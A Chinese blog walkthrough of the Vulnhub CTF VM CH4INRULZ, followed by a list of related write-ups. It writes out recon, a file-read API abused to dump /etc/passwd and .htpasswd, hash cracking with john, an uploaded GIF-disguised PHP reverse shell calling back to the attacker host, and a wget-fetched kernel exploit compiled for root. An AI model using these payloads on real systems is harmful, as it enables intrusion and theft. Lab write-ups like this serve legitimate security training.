VM - CH4INRULZ_v1.0.1 的破解
本文主要記錄對 CH4INRULZ_v1.0.1 的滲透學習過程,測試的 VM 主機主要來源 www.vulnhub.com
部落格集:面向 CTF 的 VM 破解系列
下載連結:CH4INRULZ_v1.0.1
-
系統為DHCP,不知道IP,可以使用 netdiscover
root@kali:~# netdiscover -r 10.10.10.0/24 Currently scanning: Finished! | Screen View: Unique Hosts 6 Captured ARP Req/Rep packets, from 4 hosts. Total size: 360 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 10.10.10.1 00:50:56:c0:00:08 2 120 VMware, Inc. 10.10.10.2 00:50:56:fb:16:b2 1 60 VMware, Inc. 10.10.10.168 00:0c:29:15:19:a3 2 120 VMware, Inc. 10.10.10.254 00:50:56:e8:71:43 1 60 VMware, Inc.
-
發現IP為 10.10.10.168,下面進行埠發現
root@kali:~# nmap -A 10.10.10.168 -p 1-65535 -T4 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-04 22:53 EST Nmap scan report for 10.10.10.168 Host is up (0.00039s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.5 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.10.166 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 2.3.5 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 d4:f8:c1:55:92:75:93:f7:7b:65:dd:2b:94:e8:bb:47 (DSA) | 2048 3d:24:ea:4f:a2:2a:ca:63:b7:f4:27:0f:d9:17:03:22 (RSA) |_ 256 e2:54:a7:c7:ef:aa:8c:15:61:20:bd:aa:72:c0:17:88 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: FRANK's Website | Under development 8011/tcp open http Apache httpd 2.2.22 ((Ubuntu)) |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Site doesn't have a title (text/html). MAC Address: 00:0C:29:15:19:A3 (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.19 - 2.6.36 Network Distance: 1 hop Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.39 ms 10.10.10.168 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.78 seconds
探測發現存在21、22、80、8011埠,首先對 21 埠進行排查
PS C:\Users\John> ftp 10.10.10.168 連線到 10.10.10.168。 220 (vsFTPd 2.3.5) 200 Always in UTF8 mode. 使用者(10.10.10.168:(none)): Anonymous 331 Please specify the password. 密碼: 230 Login successful. ftp> ftp> ls -la
ftp 伺服器未發現有價值的線索,另外,vsftpd的版本未發現現有的漏洞
root@kali:~# searchsploit vsftpd --------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) --------------------------------------------------------------------------------------------------------------------- ---------------------------------------- vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption | exploits/linux/dos/5814.pl vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | exploits/windows/dos/31818.sh vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | exploits/windows/dos/31819.pl vsftpd 2.3.2 - Denial of Service | exploits/linux/dos/16270.c vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rb --------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result root@kali:~#
22 埠的 opensshOpenSSH 5.9p1 Debian 5ubuntu1.10 也沒發現版本漏洞
-
下面對 8011 埠進行測試
使用 dirb 進行目錄暴破
oot@kali:~# dirb http://10.10.10.168:8011 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon Mar 4 23:15:57 2019 URL_BASE: http://10.10.10.168:8011/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.168:8011/ ---- ==> DIRECTORY: http://10.10.10.168:8011/api/ + http://10.10.10.168:8011/index.html (CODE:200|SIZE:30) + http://10.10.10.168:8011/server-status (CODE:403|SIZE:295) ---- Entering directory: http://10.10.10.168:8011/api/ ---- + http://10.10.10.168:8011/api/index.html (CODE:200|SIZE:351) ----------------- END_TIME: Mon Mar 4 23:16:02 2019 DOWNLOADED: 9224 - FOUND: 3
使用 nikto 進行漏洞掃描
oot@kali:~# nikto -C all -h 10.10.10.168:8011 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.168 + Target Hostname: 10.10.10.168 + Target Port: 8011 + Start Time: 2019-03-04 23:16:04 (GMT-5) --------------------------------------------------------------------------- + Server: Apache/2.2.22 (Ubuntu) + Server leaks inodes via ETags, header found with file /, inode: 1052109, size: 30, mtime: Sat Apr 14 08:00:08 2018 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3233: /icons/README: Apache default file found. + 26131 requests: 0 error(s) and 7 item(s) reported on remote host + End Time: 2019-03-04 23:17:16 (GMT-5) (72 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
對以上掃描結果進行訪問測試,發現 http://10.10.10.168:8011/api/index.html 有提示資訊
分別對提示中的四個頁面進行測試,發現 http://10.10.10.168:8011/api/files_api.php 有回顯資訊,並且提示資訊中提到了 file 引數
下面對file 引數進行測試,檢視是否可以利用,比如訪問“http://10.10.10.168:8011/api/files_api.php?file=/etc/passwd”,發現有攔截,說明這裡應該是可以利用的
下面嘗試使用命令列來進行測試
root@kali:~# curl -X POST -d "file=/etc/passwd" http://10.10.10.168:8011/api/files_api.php <head> <title>franks website | simple website browser API</title> </head> root:x:0:0:root:/root:/bin/bash bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false frank:x:1000:1000:frank,,,:/home/frank:/bin/bash sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin ftp:x:103:111:ftp daemon,,,:/srv/ftp:/bin/false
-
下面對 80 埠進行探測
首先使用 dirb 對網站進行目錄爆破
oot@kali:~# dirb http://10.10.10.168 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon Mar 4 23:06:36 2019 URL_BASE: http://10.10.10.168/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.168/ ---- + http://10.10.10.168/cgi-bin/ (CODE:403|SIZE:288) ==> DIRECTORY: http://10.10.10.168/css/ + http://10.10.10.168/development (CODE:401|SIZE:479) ==> DIRECTORY: http://10.10.10.168/img/ + http://10.10.10.168/index (CODE:200|SIZE:334) + http://10.10.10.168/index.html (CODE:200|SIZE:13516) ==> DIRECTORY: http://10.10.10.168/js/ + http://10.10.10.168/LICENSE (CODE:200|SIZE:1093) + http://10.10.10.168/robots (CODE:200|SIZE:21) + http://10.10.10.168/robots.txt (CODE:200|SIZE:21) + http://10.10.10.168/server-status (CODE:403|SIZE:293) ==> DIRECTORY: http://10.10.10.168/vendor/ ---- Entering directory: http://10.10.10.168/css/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.168/img/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.168/js/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.168/vendor/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Mon Mar 4 23:06:39 2019 DOWNLOADED: 4612 - FOUND: 8
發現目錄cgi-bin、development、css、img、js、vendor目錄,重點發現需要密碼驗證的目錄(後臺頁面)
root@kali:~# dirb http://10.10.10.168 | grep "CODE:401" + http://10.10.10.168/development (CODE:401|SIZE:479)
然後使用 nikto 對網站進行掃描
root@kali:~# nikto -C all -h 10.10.10.168 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.168 + Target Hostname: 10.10.10.168 + Target Port: 80 + Start Time: 2019-03-04 23:08:04 (GMT-5) --------------------------------------------------------------------------- + Server: Apache/2.2.22 (Ubuntu) + Server leaks inodes via ETags, header found with file /, inode: 1051931, size: 13516, mtime: Sat Apr 14 09:39:32 2018 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.html.bak + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3268: /img/: Directory indexing found. + OSVDB-3092: /img/: This might be interesting... + OSVDB-3233: /icons/README: Apache default file found. + 26280 requests: 0 error(s) and 11 item(s) reported on remote host + End Time: 2019-03-04 23:09:13 (GMT-5) (69 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
發現 img 目錄和 /icons/README 檔案,另外提示 index 有兩個檔案:“index.html”和“index.html.bak”
下載此檔案:
root@kali:~# wget http://10.10.10.168/index.html.bak --2019-03-04 23:36:01-- http://10.10.10.168/index.html.bak Connecting to 10.10.10.168:80... connected. HTTP request sent, awaiting response... 200 OK Length: 334 [application/x-trash] Saving to: ‘index.html.bak’ index.html.bak 100%[=============================================================================>] 334 --.-KB/s in 0s 2019-03-04 23:36:01 (71.7 MB/s) - ‘index.html.bak’ saved [334/334] root@kali:~# cat index.html.bak <html><body><h1>It works!</h1> <p>This is the default web page for this server.</p> <p>The web server software is running but no content has been added, yet.</p> <a href="/development">development</a> <!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path --> </body></html>
檢視內容,可以看到使用者名稱和密碼 frank:$apr1/aVFPluYt56UvslZMBDoC0
或者是執行命令
root@kali:~# curl -X POST -d "file=/etc/.htpasswd" http://10.10.10.168:8011/api/files_api.php <head> <title>franks website | simple website browser API</title> </head> frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
對上面的賬號密碼進行暴力猜解:
frank:$apr1/aVFPluYt56UvslZMBDoC0
可以使用 hash-identifier,判斷 hash型別,然後使用 john the rapper 暴力猜解
root@kali:~# hash-identifier ######################################################################### # __ __ __ ______ _____ # # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # # By Zion3R # # www.Blackploit.com # # Root@Blackploit.com # ######################################################################### ------------------------------------------------------------------------- HASH: $apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 Possible Hashs: [+] MD5(APR) -------------------------------------------------------------------------
然後使用 john 爆破密碼,john 的使用格式是將密碼複製進檔案然後進行猜解的
root@kali:~# cat hash.txt frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 root@kali:~# john hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 256/256 AVX2 8x3]) Will run 2 OpenMP threads Proceeding with single, rules:Wordlist Press 'q' or Ctrl-C to abort, almost any other key for status Warning: Only 22 candidates buffered for the current salt, minimum 48 needed for performance. Warning: Only 33 candidates buffered for the current salt, minimum 48 needed for performance. frank!!! (frank) 1g 0:00:00:00 DONE 1/3 (2019-03-05 00:05) 50.00g/s 9950p/s 9950c/s 9950C/s FRANK1..gfrank Use the "--show" option to display all of the cracked passwords reliably Session completed
現在我們有了密碼frank:frank!!!,使用密碼登入 development 目錄
找到關鍵詞 uploader ,嘗試作為路徑訪問
猜測應該有檔案上傳漏洞,進行登入測試,上傳發現只支援圖片格式
在 kali 中找一個 php 反彈木馬嘗試上傳,格式化成 GIF98 檔案頭的圖片格式
root@kali:~# cat reerse_php.gif GIF98 <?php $sock=fsockopen("10.10.10.166",4444); exec("/bin/sh -i <&3 >&3 2>&3"); ?>
上傳成功:
但是即使上傳成功,也不能利用,這時候嘗試目錄爆破。經過目錄暴破發現還存在目錄“http://10.10.10.168/development/uploader/FRANKuploads/”
不知道 FRANKuploads 是哪裡來的,僅新增一張圖,其他的未做改變。
在kali 開啟監聽埠,然後訪問反彈shell 的圖片
root@kali:~# nc -nvlp 4444 retrying local 0.0.0.0:4444 : Address already in use
另一個視窗開啟:
curl -X POST -d file=/var/www/development/uploader/FRANKuploads/reerse_php.gif 10.10.10.168:8011/api/files_api.php
此時發現建立的連線,連上就斷開了,判斷是 反彈webshell 有問題,所以使用一個kali官方的反彈 shell:
/usr/share/webshells/php/php-reverse-shell.php修改檔案頭為 GIF98,修改檔案字尾為 gif,開始上傳。
-
反彈shell
使用 msf 或者 nc 設定監聽 4444 埠,設定反彈 shell 的埠為 4444,監聽
root@kali:~# nc -nvlp 4444 listening on [any] 4444 ...
新視窗訪問
root@kali:~/Desktop# curl -X POST -d file=/var/www/development/uploader/FRANKuploads/php-reverse-shell4.gif 10.10.10.168:8011/api/files_api.php
獲得shell
root@kali:~# nc -nvlp 4444 listening on [any] 4444 ... connect to [10.10.10.166] from (UNKNOWN) [10.10.10.168] 37548 Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux 06:26:47 up 2:36, 0 users, load average: 0.00, 0.01, 1.64 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: can't access tty; job control turned off
更換為 bash
$ python -c 'import pty; pty.spawn("/bin/bash")' www-data@ubuntu:/$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data)
-
提權
檢視核心版本
www-data@ubuntu:/home/frank$ uname -a uname -a Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
搜尋核心版本漏洞
root@kali:~# searchsploit linux 2.6.35 --------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) --------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Linux Kernel 2.6.35 - Network Namespace Remote Denial of Service | exploits/linux/dos/36425.txt --------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result
在 kali 設定簡單的 HTTP 伺服器
root@kali:/var/www/html# python -m SimpleHTTPServer 80
靶機執行命令
www-data@ubuntu:/var/www$ cd /var/tmp cd /var/tmp www-data@ubuntu:/var/tmp$ wget http://10.10.10.166/15285.c wget http://10.10.10.166/15285.c --2019-03-05 06:51:42-- http://10.10.10.166/15285.c Connecting to 10.10.10.166:80... connected. HTTP request sent, awaiting response... 200 OK Length: 7155 (7.0K) [text/x-csrc] Saving to: `15285.c' 100%[======================================>] 7,155 --.-K/s in 0s 2019-03-05 06:51:42 (68.9 MB/s) - `15285.c' saved [7155/7155] www-data@ubuntu:/var/tmp$ ls ls 15285.c www-data@ubuntu:/var/tmp$ ls ls 15285.c www-data@ubuntu:/var/tmp$ gcc 15285.c -o 15285 gcc 15285.c -o 15285 www-data@ubuntu:/var/tmp$ chmod 777 15285 chmod 777 15285 www-data@ubuntu:/var/tmp$ ./15285 ./15285 [*] Linux kernel >= 2.6.30 RDS socket exploit [*] by Dan Rosenberg [*] Resolving kernel addresses... [+] Resolved security_ops to 0xffffffff81ce8df0 [+] Resolved default_security_ops to 0xffffffff81a523e0 [+] Resolved cap_ptrace_traceme to 0xffffffff8125db60 [+] Resolved commit_creds to 0xffffffff810852b0 [+] Resolved prepare_kernel_cred to 0xffffffff81085780 [*] Overwriting security ops... [*] Overwriting function pointer... [*] Triggering payload... [*] Restoring function pointer... [*] Got root! # # python -c 'import pty; pty.spawn("/bin/bash")' root@ubuntu:/var/tmp# id id uid=0(root) gid=0(root) groups=0(root)
至此,已完成。
相關文章
- VM - DerpNStink 的破解
- VM - Raven: 1 的破解
- VM - Lazysysadmin 的破解
- 面向 CTF 的 VM 破解系列
- VM - Typhoon 1.02 的破解
- VM - FourAndSix 2.01 的破解
- VM - 64Base_3mrgnc3 的破解
- VM - 6Days_Lab-v1.0.1 的破解
- VM - JIS-CTF-VulnUpload-CTF01 的破解
- 把ASM下的HDD VM轉換成ARM下Managed Disk的SSD VMASM
- Azure VM的加速網路
- Vm 增加硬碟硬碟
- [VM trunk ports]opensatck VM 單網路卡,多VLAN配置
- 在ARM模式下捕獲VM並建立新VM模式
- node核心模組-vm
- Oracle VM釋出Oracle
- JAVA VM 與DalvikJava
- docker vm 效能優劣Docker
- css vm用法介紹CSS
- VM 常用命令
- Oracle VM初識(一)Oracle
- Oracle VM初識(二)Oracle
- solaris vm create new lv
- 資料:Java HotSpot VMJavaHotSpot
- 聊聊HotSpot VM的Native Memory TrackingHotSpot
- VM中的Ubuntu(16.04)安裝tenserflowUbuntu
- 正確使用Windows Azure 中的VM RoleWindows
- limo和Dalvik VM的一個思路
- Flutter:VM snapshot must be valid. Check failed: vm. Must be able to initializeFlutterAI
- Java的破解和反破解之道 (轉)Java
- idea VM Options 設定Idea
- NodeJs VM模組詳解NodeJS
- VM軟體建立共享磁碟
- oracle VM掛載光碟機Oracle
- vm server RAC--補丁Server
- vm server RAC--IP 地址Server
- Oracle rac on vm--共享磁碟Oracle
- VM新版本下載